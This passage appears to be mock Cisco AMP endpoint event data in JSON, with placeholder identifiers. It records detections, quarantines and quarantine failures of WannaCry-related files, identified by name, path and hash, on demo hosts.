Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":612000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":565000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769884","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":206000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769883","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":128000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769882","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":565000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769884","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":206000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769883","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":128000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769882","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835282","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835281","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835280","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 